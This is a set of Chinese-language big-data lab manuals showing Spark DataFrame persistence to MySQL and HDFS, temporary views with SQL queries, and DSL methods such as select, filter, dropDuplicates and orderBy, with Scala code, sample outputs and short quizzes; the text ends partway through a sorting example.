DataFrame持久存储
1. 实验室名称:大数据实验教学系统2. 实验项目名称:DataFrame持久存储3. 实验学时:4. 实验原理:DataFrame数据经过计算以后,可以持久到外部存储中,如关系型数据库和HDFS中。Spark对此提供了支持。5. 实验目的:掌握DataFrame存储操作。6. 实验内容:将DataFrame持久存储。具体包含如下内容: - 写入MySQL - 写入HDFS7. 实验器材(设备、虚拟机名称):硬件:x86_64 ubuntu 16.04服务器 软件:JDK 1.8,Spark-2.3.2,Hadoop-2.7.3,zeppelin-0.8.18. 实验步骤:8.1 环境准备1、右击Ubuntu操作系统桌面,从弹出菜单中选择【Open in Terminal】命令打开终端。 在终端窗口下,输入以下命令,分别启动HDFS集群、Spark集群和Zeppelin服务器:1. $ start-dfs.sh
2. $ cd /opt/spark
3. $ ./sbin/start-all.sh
4. $ zeppelin-daemon.sh start
2、将本地数据上传至HDFS上。在终端窗口中,分别执行以下命令上传数据:1. $ hdfs dfs -mkdir -p /data/dataset/batch
2. $ hdfs dfs -put /data/dataset/batch/Online-Retail.txt /data/dataset/batch/
3、因为后面的实验中需要访问MySQL数据库,所以先要将MySQL的jdbc驱动程序拷贝到Spark的jars目录下。在终端窗口,执行如下的命令:1. $ cp /data/software/mysql-connector-java-5.1.45-bin.jar /opt/spark/jars/
4、启动浏览器,打开zeppelin notebook首页,点击【Create new note】链接,创建一个新的笔记本,名字为【rdd_demo】,解释器默认使用【spark】,如下图所示:8.2 数据存储1、读取数据,生成RDD,创建DataFrame。在zeppelin中执行如下代码:1. import org.apache.spark.sql.types._
2. import org.apache.spark.sql._
3. import org.apache.spark.sql.functions._
4.
5. // 数据路径
6. var filePath = "/data/dataset/batch/Online-Retail.txt"
7.
8. // 加载RDD
9. var inFileRDD= sc.textFile(filePath)
10. // 以制表符进行分割
11. var allRowsRDD=inFileRDD.map(x=> x.split("\t"))
12.
13. // 获取RDD的第一条数据头标签
14. var header = allRowsRDD.first()
15.
16. // 去除标题行
17. var data = allRowsRDD.filter(x => x(0) != header(0))
18.
19. // 创建Schema
20. var fields= List(StructField("invoiceNo", StringType, true),
21. StructField("stockCode", StringType, true),
22. StructField("description", StringType, true),
23. StructField("quantity", IntegerType, true),
24. StructField("invoiceDate", StringType, true),
25. StructField("unitPrice", DoubleType, true),
26. StructField("customerID", StringType, true),
27. StructField("country", StringType, true)
28. )
29. val schema = StructType(fields)
30.
31.
32. // 将RDD中的每行数据转换为Row对象
33. var rowRDD = data.map( x => Row(x(0),x(1),x(2),x(3).toInt,x(4),x(5).toDouble,x(6),x(7)))
34.
35. // 创建DataFrame
36. var r1DF = spark.createDataFrame(rowRDD,schema)
37. // 显示DataFrame数据
38. r1DF.show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下所示:1. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+
2. |invoiceNo|stockCode| description|quantity| invoiceDate|unitPrice|customerID| country|
3. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+
4. | 536365| 85123A|WHITE HANGING HEA...| 6|2010/12/1 8:26| 2.55| 17850|United Kingdom|
5. | 536365| 71053| WHITE METAL LANTERN| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|
6. | 536365| 84406B|CREAM CUPID HEART...| 8|2010/12/1 8:26| 2.75| 17850|United Kingdom|
7. | 536365| 84029G|KNITTED UNION FLA...| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|
8. | 536365| 84029E|RED WOOLLY HOTTIE...| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|
9. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+
10. only showing top 5 rows
2、数据类型转换,创建本地视图,调用sql语句进行查询。在zeppelin中执行如下代码:1. // 将invoiceDate列强制转换为时间类型
2. var ts = unix_timestamp($"invoiceDate","yyyy/MM/dd HH:mm").cast("timestamp")
3.
4. // 为DataFrame添加一列
5. var r2DF = r1DF.withColumn("ts",ts)
6. // 显示添加后的数据
7. r2DF.show(5)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+-------------------+
2. |invoiceNo|stockCode| description|quantity| invoiceDate|unitPrice|customerID| country| ts|
3. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+-------------------+
4. | 536365| 85123A|WHITE HANGING HEA...| 6|2010/12/1 8:26| 2.55| 17850|United Kingdom|2010-12-01 08:26:00|
5. | 536365| 71053| WHITE METAL LANTERN| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|2010-12-01 08:26:00|
6. | 536365| 84406B|CREAM CUPID HEART...| 8|2010/12/1 8:26| 2.75| 17850|United Kingdom|2010-12-01 08:26:00|
7. | 536365| 84029G|KNITTED UNION FLA...| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|2010-12-01 08:26:00|
8. | 536365| 84029E|RED WOOLLY HOTTIE...| 6|2010/12/1 8:26| 3.39| 17850|United Kingdom|2010-12-01 08:26:00|
9. +---------+---------+--------------------+--------+--------------+---------+----------+--------------+-------------------+
10. only showing top 5 rows
3、对数据进行查询,选择满足条件的数据。在zeppelin中执行如下代码:1. import java.util.Properties
2.
3. // 创建本地临时视图
4. r2DF.createOrReplaceTempView("retailTable")
5. // 查找时间小于2011-12-01的数据
6. var r3DF = spark.sql("select * from retailTable where ts<\"2011-12-01\"")
7.
8. // 查找时间大于等于2011-12-01的数据
9. var r4DF = spark.sql("select * from retailTable where ts>=\"2011-12-01\"")
10.
11. // 选取数据
12. var selectData = r4DF.select("invoiceNo","stockCode","description","quantity","unitPrice","customerID","country","ts")
13.
14. // 修改列的名字
15. var writeMySQL = selectData.withColumnRenamed("ts","invoiceDate")
16. // 显示修改后的DataFrame
17. writeMySQL.show(5)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---------+---------+--------------------+--------+---------+----------+--------------+-------------------+
2. |invoiceNo|stockCode| description|quantity|unitPrice|customerID| country| invoiceDate|
3. +---------+---------+--------------------+--------+---------+----------+--------------+-------------------+
4. | C579889| 23245|SET OF 3 REGENCY ...| -8| 4.15| 13853|United Kingdom|2011-12-01 08:12:00|
5. | C579890| 84947|ANTIQUE SILVER TE...| -1| 1.25| 15197|United Kingdom|2011-12-01 08:14:00|
6. | C579890| 23374|RED SPOT PAPER GI...| -1| 0.82| 15197|United Kingdom|2011-12-01 08:14:00|
7. | C579890| 84945|MULTI COLOUR SILV...| -2| 0.85| 15197|United Kingdom|2011-12-01 08:14:00|
8. | C579891| 23485|BOTANICAL GARDENS...| -1| 25.0| 13644|United Kingdom|2011-12-01 08:18:00|
9. +---------+---------+--------------------+--------+---------+----------+--------------+-------------------+
10. only showing top 5 rows
4、将查询到的数据存储到MySQL中。 (1)首先启动MySQL服务器。在终端窗口中,执行以下命令:1. $ service mysql start
(2)登录MySQL服务器。在终端窗口中,执行以下命令:1. $ mysql -u root -p
然后根据提示,输入登录密码:root。 (3)执行以下SQL语句,创建测试表:1. mysql> create database retailDB;
2. mysql> exit;
(4)在zeppelin中执行如下代码:1. // 将DataFrame数据存储到数据库中
2. val prop = new Properties()
3. prop.setProperty("user", "root")
4. prop.setProperty("password", "root")
5.
6. writeMySQL.write.mode("append").jdbc("jdbc:mysql://localhost:3306/retailDB?characterEncoding=UTF-8", "transactions", prop)
验证保存成功。进入MySQL,通过【select count(*) from transactions;】来查看写入MySQL的数据条数。5、将DataFrame存储到HDFS中。选择满足条件的数据,将数据写入到HDFS中。在zeppelin中执行如下代码:1. var selectData = r3DF.select("invoiceNo","stockCode","description","quantity","unitPrice","customerID","country","ts")
2. var writeHDFS = selectData.withColumnRenamed("ts","invoiceDate")
3. writeHDFS.select("*").write.format("json").save("/Users/r3DF")
同时按下【shift+enter】对程序进行输出。 验证保存到HDFS中成功。在终端窗口下,执行以下命令,查看写入HDFS的json数据:1. # hdfs dfs -ls /Users/r3DF
可以看到已经写入成功,如下图所示:9. 实验结果及分析:实验结果运行准确,无误10. 实验结论:经过本节实验的学习,通过学习DataFrame持久存储,进一步巩固了我们的Spark基础。11. 总结及心得体会:SparkSQL对SQL语句的处理和关系型数据库采用了类似的方法,SparkSQL会先将SQL语句进行解析Parse形成一个Tree,然后使用Rule对Tree进行绑定、优化等处理过程,通过模式匹配对不同类型的节点采用不同的操作。而SparkSQL的查询优化器是Catalyst,它负责处理查询语句的解析、绑定、优化和生成物理计划等过程,Catalyst是SparkSQL最核心的部分,其性能优劣将决定整体的性能。12、 实验测试1、数据写入MySQL中mode=’append’的意思是什么( A ){单选} A、追加 B、覆盖 C、修改 D、删除13、实验拓展1、给定给一个文本数据,将数据转换为DataFrame类型,并将数据写入到MySQL 中。
DataFrame的操作-使用SQL
1. 实验室名称:大数据实验教学系统2. 实验项目名称:DataFrame的操作-使用SQL3. 实验学时:4. 实验原理:在SparkSQL对SQL语句的处理和关系型数据库采用了类似的方法,SparkSQL会先将SQL语句进行解析Parse形成一个Tree,然后使用Rule对Tree进行绑定、优化等处理过程,通过模式匹配对不同类型的节点采用不同的操作。而SparkSQL的查询优化器是Catalyst,它负责处理查询语句的解析、绑定、优化和生成物理计划等过程,Catalyst是SparkSQL最核心的部分,其性能优劣将决定整体的性能。5. 实验目的:掌握Spark SQL临时视图的创建。 掌握Spark SQL查询。6. 实验内容:使用标准SQL对DataFrame进行操作。具体包含如下内容: 1、临时表创建 - createGlobalTempView(name) - createOrReplaceGlobalTempView(name) - createOrReplaceTempView(name) - createTempView(name) - registerTempTable(name) - dropTempView(name) 2、Spark SQL查询 - 加载数据集及处理 - 创建临时表并查询 - 创建永久表并查询7. 实验器材(设备、虚拟机名称):硬件:x86_64 ubuntu 16.04服务器 软件:JDK 1.8,Spark-2.3.2,Hadoop-2.7.3,zeppelin-0.8.18. 实验步骤:8.1 环境准备1、在终端窗口下,输入以下命令,分别启动HDFS集群、Spark集群和Zeppelin服务器:1. $ start-dfs.sh
2. $ cd /opt/spark
3. $ ./sbin/start-all.sh
4. $ zeppelin-daemon.sh start
2. 将本实验用到的数据集上传到HDFS上。在终端窗口中,执行以下命令:1. $ hdfs dfs -mkdir -p /data/dataset/batch
2. $ hdfs dfs -put /data/dataset/batch/customers.csv /data/dataset/batch/
3. $ hdfs dfs -put /data/dataset/batch/wc.txt /data/dataset/batch/
3、启动浏览器,打开zeppelin notebook首页,点击【Create new note】链接,创建一个新的笔记本,名字为【rdd_demo】,解释器默认使用【spark】,如下图所示:8.2 临时视图的创建1、使用createGlobalTempView(name)方法为DataFrame创建一个全局的临时表,其生命周期和启动的app的周期一致,既启动的spark应用存在则这个临时的表就一直能访问,直道sparkcontext的stop方法的调用退出应用为止。创建的临时表保存在global_temp这个库中。 在zeppelin中执行如下代码:1. var df = spark.read.option("header","true").csv("/data/dataset/batch/customers.csv")
2. df.createGlobalTempView("xx")
3.
4. // 查询
5. spark.sql("select * from global_temp.xx").show(5)
【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. +---+------+---+-------------+
10. only showing top 5 rows
2、使用createOrReplaceGlobalTempView(name)方法创建或替换视图。上面的方法当遇到已经创建了的临时表名的话会报错。而这个方法遇到已经存在的临时表会进行替换,没有则创建。在zeppelin中执行如下代码:1. // 创建临时表,存在则覆盖
2. df.createOrReplaceGlobalTempView("XX")
3.
4. // 查询
5. spark.sql("select * from global_temp.XX").show(5)
【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. +---+------+---+-------------+
10. only showing top 5 rows
3、使用createOrReplaceTempView(name)方法为DataFrame创建本地的临时视图,其生命周期只限于当前的SparkSession,当调用了SparkSession的stop方法停止SparkSession后,其生命周期就到此为止了。 在zeppelin中执行如下代码:1.
2. // 创建本地的临时视图
3. df.createOrReplaceTempView("TT")
4.
5. // 查询
6. spark.sql("select * from TT").show(5)
【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. +---+------+---+-------------+
10. only showing top 5 rows
4、使用createTempView(name)方法创建临时视图。这个方法在创建临时视图时若遇到已经创建过的视图的名字,会报错。因此需要指定另外的名字。在zeppelin中执行如下代码:1.
2. // 创建视图
3. df.createTempView("T2")
4.
5. // 查询
6. spark.sql("select * from T2").show(5)
【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. +---+------+---+-------------+
10. only showing top 5 rows
8.3 执行Spark SQL查询1、创建数据,从HDFS上进行数据读取,数据转换为DataFrame类型。在zeppelin中执行如下代码:1. import org.apache.spark.sql.types._
2. import org.apache.spark.sql._
3.
4. // 数据路径
5. var filePath = "/data/dataset/batch/wc.txt"
6.
7. // 创建RDD
8. var rdd1 = sc.textFile(filePath)
9.
10. // RDD进行flatMap操作后进行map操作
11. var rdd2 = rdd1.flatMap( x=>x.split(" ")).map( word=>Row(word,1))
12.
13. // 指定schema
14. var schema = StructType(List(StructField("word",StringType,true),StructField("count",IntegerType,true)))
15.
16. // 创建DataFrame
17. var wordDF = spark.createDataFrame(rdd2,schema)
18. // 查看df的数据结构信息
19. wordDF.printSchema
【shift+enter】对程序进行输出。输出内容如下所示:1. root
2. |-- word: string (nullable = true)
3. |-- count: integer (nullable = true)
2、创建临时表,数据查询。在zeppelin中执行如下代码:1. // 注册临时表
2. wordDF.createOrReplaceTempView("wc")
3.
4. // 从临时表wc中执行sql查询
5. var resultDF = spark.sql("select * from wc")
6. // 展示DF
7. resultDF.show
8.
9. // 从临时表中执行sql查询
10. var resultDF2 = spark.sql("select word,count(*) as total from wc group by word")
11. // 展示DF
12. resultDF2.show
【shift+enter】对程序进行输出。输出内容如下所示:1. +-----+-----+
2. | word|count|
3. +-----+-----+
4. | good| 1|
5. | good| 1|
6. |study| 1|
7. | day| 1|
8. | day| 1|
9. | up| 1|
10. +-----+-----+
11.
12. +-----+-----+
13. | word|total|
14. +-----+-----+
15. | day| 2|
16. |study| 1|
17. | up| 1|
18. | good| 2|
19. +-----+-----+
3、创建永久表,数据查询。在zeppelin中执行如下代码:1. // 注册为永久表
2. wordDF.write.saveAsTable("wccc")
3.
4. // 从永久表中执行查询
5. var resultDF3 = spark.sql("select * from wccc")
6. // 数据展示
7. resultDF3.show()
8.
9. // 从永久表中执行wccc查询
10. var resultDF4 = spark.sql("select word,count(*) as total from wccc group by word")
11. // 数据展示
12. resultDF4.show()
【shift+enter】对程序进行输出。输出内容如下所示:1. +-----+-----+
2. | word|count|
3. +-----+-----+
4. | good| 1|
5. | good| 1|
6. |study| 1|
7. | day| 1|
8. | day| 1|
9. | up| 1|
10. +-----+-----+
11.
12. +-----+-----+
13. | word|total|
14. +-----+-----+
15. | day| 2|
16. |study| 1|
17. | up| 1|
18. | good| 2|
19. +-----+-----+
9. 实验结果及分析:实验结果运行准确,无误10. 实验结论:经过本节实验的学习,通过DataFrame的操作-使用SQL,进一步巩固了我们的Spark基础。11. 总结及心得体会:SparkSQL对SQL语句的处理和关系型数据库采用了类似的方法,SparkSQL会先将SQL语句进行解析Parse形成一个Tree,然后使用Rule对Tree进行绑定、优化等处理过程,通过模式匹配对不同类型的节点采用不同的操作。而SparkSQL的查询优化器是Catalyst,它负责处理查询语句的解析、绑定、优化和生成物理计划等过程,Catalyst是SparkSQL最核心的部分,其性能优劣将决定整体的性能。12、 实验知识测试1、创建本地临时视图表成功的方法是( C ){单选} A、createGlobalTempView(name) B、createOrReplaceGlobalTempView(name) C、createOrReplaceTempView(name) D、createTempView(name)13、实验拓展给定本地一个文本数据,并上传至HDFS,读取后创建为DataFrame,并创建临时表对数据进行查询。
DataFrame的操作-使用DSL
1. 实验室名称:大数据实验教学系统2. 实验项目名称:DataFrame的操作-使用DSL3. 实验学时:4. 实验原理:在Spark中,DataFrame是一种以RDD为基础的分布式数据集,类似于传统数据库中的二维表格。DataFrame与RDD的主要区别在于,前者带有schema元信息,即DataFrame所表示的二维表数据集的每一列都带有名称和类型。这使得Spark SQL得以洞察更多的结构信息,从而对藏于DataFrame背后的数据源以及作用于DataFrame之上的变换进行了针对性的优化,最终达到大幅提升运行时效率的目标。反观RDD,由于无从得知所存数据元素的具体内部结构,Spark Core只能在stage层面进行简单、通用的流水线优化。5. 实验目的:掌握操作DataFrame的各种方法(转换、过滤、排序等)。 掌握DataFrame存储操作。6. 实验内容:操作DataFrame的转换、过滤、排序等方法。具体包含如下内容: - select(cols) - selectExpr(expr) - drop(cols) - dropDuplicates(subset=None) - dropna(how=’any’,thresh=None,subset=None) - filter(condition) - where(condition) - limit(num) - withColumn(colName,col) - withColumnRename(existing,new) - orderBy(cols,kwargs)7. 实验器材(设备、虚拟机名称):硬件:x86_64 ubuntu 16.04服务器 软件:JDK 1.8,Spark-2.3.2,Hadoop-2.7.3,zeppelin-0.8.18. 实验步骤:8.1 环境准备1、右击Ubuntu操作系统桌面,从弹出菜单中选择【Open in Terminal】命令打开终端。 在终端窗口下,输入以下命令,分别启动HDFS集群、Spark集群和Zeppelin服务器:1. $ start-dfs.sh
2. $ cd /opt/spark
3. $ ./sbin/start-all.sh
4. $ zeppelin-daemon.sh start
2、将本地数据上传至HDFS上。在终端窗口中,分别执行以下命令上传数据:1. $ hdfs dfs -mkdir -p /data/dataset/batch
2. $ hdfs dfs -put /data/dataset/batch/customers.csv /data/dataset/batch/
3、启动浏览器,打开zeppelin notebook首页,点击【Create new note】链接,创建一个新的笔记本,名字为【rdd_demo】,解释器默认使用【spark】,如下图所示:8.2 DataFrame的方法1、select(*cols)通过表达式选取DataFRame中符合条件的数据,返回新的DataFrame。在zeppelin中执行如下代码:1. // 读取csv数据
2. var df = spark.read.option("header","true").csv("/data/dataset/batch/customers.csv")
3.
4. // 通过select统计共有多少条数据
5. df.select("*").count()
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. df: org.apache.spark.sql.DataFrame = [ID: string, Gener: string ... 2 more fields]
2. res196: Long = 40
通过表达式选取DataFRame中符合条件的数据。在zeppelin中执行如下代码:1. // 选取Age和Gener列,获取前十条数据
2. df.select("Age","Gener").show(10)
3.
4. // 查找Age列,并重命名为age,输出前十条数据
5. df.select($"Age".alias("age")).show(10)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+
2. |Age| Gener|
3. +---+------+
4. | 34| Male|
5. | 23|Female|
6. | 26|Female|
7. | 27|Female|
8. | 24| Male|
9. | 33| Male|
10. | 34| Male|
11. | 23| Male|
12. | 26| Male|
13. | 27|Female|
14. +---+------+
15. only showing top 10 rows
16.
17. +---+
18. |age|
19. +---+
20. | 34|
21. | 23|
22. | 26|
23. | 27|
24. | 24|
25. | 33|
26. | 34|
27. | 23|
28. | 26|
29. | 27|
30. +---+
31. only showing top 10 rows
2、selectExpr(*expr),这个方法是select方法的一个变体,可以接受一个SQL表达式,返回新的DataFrame。在zeppelin中执行如下代码:1. // 分别求取Age的乘积,Age的平方根。显示前十条数据
2. df.selectExpr("Age * 2","sqrt(Age)").show(10)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---------+-------------------------+
2. |(Age * 2)|SQRT(CAST(Age AS DOUBLE))|
3. +---------+-------------------------+
4. | 68.0| 5.830951894845301|
5. | 46.0| 4.795831523312719|
6. | 52.0| 5.0990195135927845|
7. | 54.0| 5.196152422706632|
8. | 48.0| 4.898979485566356|
9. | 66.0| 5.744562646538029|
10. | 68.0| 5.830951894845301|
11. | 46.0| 4.795831523312719|
12. | 52.0| 5.0990195135927845|
13. | 54.0| 5.196152422706632|
14. +---------+-------------------------+
15. only showing top 10 rows
3、drop(*cols)按照列名删除DataFrame中的列,返回新的DataFrame。在zeppelin中执行如下代码:1. // 打印所有的列名DataFrame.columns.values.tolist()
2. println(df.columns.toList)
3.
4. // 删除Age列名
5. var df1 = df.drop("Age")
6.
7. // 打印删除后的列名
8. println(df1.columns.toList)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. List(ID, Gener, Age, Annual Income)
2. List(ID, Gener, Annual Income)
4、dropDuplicates(subset=None)删除重复行,subset用于指定删除重复行的时候考虑那几列。在zeppelin中执行如下代码:1. // 导入所需依赖
2. import org.apache.spark.sql.Row
3. import org.apache.spark.sql._
4. import org.apache.spark.sql.types._
5.
6. // 创建RDD,转换为DataFrame
7. var df = sc.parallelize(List(Row("simple",15,175),Row("simple",15,175),Row("simpleBDP",2,180)),3)
8. val schema = StructType(
9. List(
10. StructField("name", StringType, true),
11. StructField("age", IntegerType, true),
12. StructField("height", IntegerType, true)
13. )
14. )
15.
16. var df1 = spark.createDataFrame(df, schema)
17.
18. // 展示数据
19. // df.show
20.
21. // 删除重复的数据
22. df1.dropDuplicates().show()
23.
24. // 指定重复的列进行删除
25. df1.dropDuplicates(List("age","name")).show()
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---------+---+------+
2. | name|age|height|
3. +---------+---+------+
4. |simpleBDP| 2| 180|
5. | simple| 15| 175|
6. +---------+---+------+
7.
8. +---------+---+------+
9. | name|age|height|
10. +---------+---+------+
11. |simpleBDP| 2| 180|
12. | simple| 15| 175|
13. +---------+---+------+
5、na.drop删除DataFrame中的空数据,加入”any”和”all”指定如何删除控制,加入数字参数指定有多少个空值进行删除,加入字段名删除指定字段中的空值。在zeppelin中执行如下代码:1. var dfs = sc.parallelize(List(Row(null,27.0,170.0),Row(44.0,27.0,170.0),Row(null,null,null)))
2.
3. val schema = StructType(
4. List(
5. StructField("luck", DoubleType, true),
6. StructField("age", DoubleType, true),
7. StructField("weight", DoubleType, true)
8. )
9. )
10.
11. // 创建DataFrame
12. var df = spark.createDataFrame(dfs,schema)
13.
14. // 显示DataFrame
15. df.show()
16.
17. // 有任意一个为na进行删除
18. df.na.drop("any").show
19.
20. // 全部为na进行删除
21. df.na.drop("all").show
22.
23. // 删除有两个na值的数据
24. df.na.drop(2).show()
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +----+----+------+
2. |luck| age|weight|
3. +----+----+------+
4. |null|27.0| 170.0|
5. |44.0|27.0| 170.0|
6. |null|null| null|
7. +----+----+------+
8.
9. +----+----+------+
10. |luck| age|weight|
11. +----+----+------+
12. |44.0|27.0| 170.0|
13. +----+----+------+
14.
15. +----+----+------+
16. |luck| age|weight|
17. +----+----+------+
18. |null|27.0| 170.0|
19. |44.0|27.0| 170.0|
20. +----+----+------+
21.
22. +----+----+------+
23. |luck| age|weight|
24. +----+----+------+
25. |null|27.0| 170.0|
26. |44.0|27.0| 170.0|
27. +----+----+------+
6、filter(condition)按照传入的条件进行过滤,其实where方法就是filter方法的一个别名而已。。在zeppelin中执行如下代码:1. var dfs = sc.parallelize(List(Row(null,27.0,170.0),Row(44.0,27.0,170.0),Row(null,null,null)))
2.
3. val schema = StructType(
4. List(
5. StructField("luck", DoubleType, true),
6. StructField("age", DoubleType, true),
7. StructField("weight", DoubleType, true)
8. )
9. )
10.
11. // 创建DataFrame
12. var df = spark.createDataFrame(dfs,schema)
13.
14. // 过滤数据
15. // df.filter($"luck"==44.0).show
16. df.filter("luck is not null").show
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +----+----+------+
2. |luck| age|weight|
3. +----+----+------+
4. |44.0|27.0| 170.0|
5. +----+----+------+
7、where(condition),这个方法和filter方法类似,更具传入的条件作出选择。在zeppelin中执行如下代码:1. // 加载csv数据
2. var df = spark.read.option("header","true").csv("/data/dataset/batch/customers.csv")
3.
4. // 打印数据
5. // df.show
6.
7. // 数据筛选
8. df.where("Age >= 30").show
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 6| Male| 33| 2000|
6. | 7| Male| 34| 3500|
7. | 12|Female| 33| 3500|
8. | 13|Female| 34| 2500|
9. | 18| Male| 33| 2500|
10. | 19|Female| 34| 4500|
11. | 24| Male| 33| 4500|
12. | 25| Male| 34| 5500|
13. | 30|Female| 33| 5500|
14. | 31| Male| 34| 2000|
15. | 36|Female| 33| 2000|
16. | 37|Female| 34| 3500|
17. +---+------+---+-------------+
8、limit(num)限制返回的数据的条数,防止返回到driver节点的数据过大造成OOM。在zeppelin中执行如下代码:1. // 限制返回10条数据
2. df.limit(10).show
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. | 6| Male| 33| 2000|
10. | 7| Male| 34| 3500|
11. | 8| Male| 23| 2500|
12. | 9| Male| 26| 4500|
13. | 10|Female| 27| 5500|
14. +---+------+---+-------------+
9、withColumn(colName,col),返回一个新的DataFrame,这个DataFrame中新增加的colNAme的列,如果原来本身就有colName的列,就替换掉。在zeppelin中执行如下代码:1. // 添加Age列,Age本身存在,替换掉
2. df.withColumn("Age",$"Age"*$"Age").show(10)
3.
4. // 添加Age2列
5. df.withColumn("Age2",$"Age"*$"Age").show(10)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+------+-------------+
2. | ID| Gener| Age|Annual Income|
3. +---+------+------+-------------+
4. | 1| Male|1156.0| 2000|
5. | 2|Female| 529.0| 3500|
6. | 3|Female| 676.0| 2500|
7. | 4|Female| 729.0| 4500|
8. | 5| Male| 576.0| 5500|
9. | 6| Male|1089.0| 2000|
10. | 7| Male|1156.0| 3500|
11. | 8| Male| 529.0| 2500|
12. | 9| Male| 676.0| 4500|
13. | 10|Female| 729.0| 5500|
14. +---+------+------+-------------+
15. only showing top 10 rows
16.
17. +---+------+---+-------------+------+
18. | ID| Gener|Age|Annual Income| Age2|
19. +---+------+---+-------------+------+
20. | 1| Male| 34| 2000|1156.0|
21. | 2|Female| 23| 3500| 529.0|
22. | 3|Female| 26| 2500| 676.0|
23. | 4|Female| 27| 4500| 729.0|
24. | 5| Male| 24| 5500| 576.0|
25. | 6| Male| 33| 2000|1089.0|
26. | 7| Male| 34| 3500|1156.0|
27. | 8| Male| 23| 2500| 529.0|
28. | 9| Male| 26| 4500| 676.0|
29. | 10|Female| 27| 5500| 729.0|
30. +---+------+---+-------------+------+
31. only showing top 10 rows
10、withColumnRename(existing,new),对已经存在的列明重命名为new,若名称不存在则这个操作不做任何事情。在zeppelin中执行如下代码:1. // 修改Age的列名
2. df.withColumnRenamed("Age","age").show(10)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+---+-------------+
2. | ID| Gener|age|Annual Income|
3. +---+------+---+-------------+
4. | 1| Male| 34| 2000|
5. | 2|Female| 23| 3500|
6. | 3|Female| 26| 2500|
7. | 4|Female| 27| 4500|
8. | 5| Male| 24| 5500|
9. | 6| Male| 33| 2000|
10. | 7| Male| 34| 3500|
11. | 8| Male| 23| 2500|
12. | 9| Male| 26| 4500|
13. | 10|Female| 27| 5500|
14. +---+------+---+-------------+
15. only showing top 10 rows
11、orderBy(cols,*kwargs),返回按照指定列排好序的新的DataFrame。在zeppelin中执行如下代码:1. // 对年龄进行排序
2. df.orderBy("Age").show(5)
3.
4. // 降序排序
5. df.orderBy($"Age".desc).show(5)
同时按下【shift+enter】对程序进行输出。输出结果如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 8| Male| 23| 2500|
5. | 14| Male| 23| 4500|
6. | 2|Female| 23| 3500|
7. | 32| Male| 23| 3500|
8. | 20|Female| 23| 5500|
9. +---+------+---+-------------+
10. only showing top 5 rows
11.
12. +---+------+---+-------------+
13. | ID| Gener|Age|Annual Income|
14. +---+------+---+-------------+
15. | 7| Male| 34| 3500|
16. | 13|Female| 34| 2500|
17. | 1| Male| 34| 2000|
18. | 31| Male| 34| 2000|
19. | 19|Female| 34| 4500|
20. +---+------+---+-------------+
21. only showing top 5 rows
使用ascending关键字参数指定升降序排列。除了这种方式,还可以通过pyspark.sql.functions中定义好的desc降序和asc方法来排序。在zeppelin中执行如下代码:1. import org.apache.spark.sql.functions._
2.
3. // 对年龄进行排序
4. df.orderBy(desc("Age")).show(5)
5.
6. // 降序排序
7. df.orderBy($"Age".desc).show(5)
8.
9. // 对年龄进行排序
10. df.orderBy(asc("Age")).show(5)
11.
12. // 生序排序
13. df.orderBy($"Age".asc).show(5)
同时按下【shift+enter】对程序进行输出。输出内容如下所示:1. +---+------+---+-------------+
2. | ID| Gener|Age|Annual Income|
3. +---+------+---+-------------+
4. | 7| Male| 34| 3500|
5. | 13|Female| 34| 2500|
6. | 1| Male| 34| 2000|
7. | 31| Male| 34| 2000|
8. | 19|Female| 34| 4500|
9. +---+------+---+-------------+
10. only showing top 5 rows
11.
12. +---+------+---+-------------+
13. | ID| Gener|Age|Annual Income|
14. +---+------+---+-------------+
15. | 7| Male| 34| 3500|
16. | 13|Female| 34| 2500|
17. | 1| Male| 34| 2000|
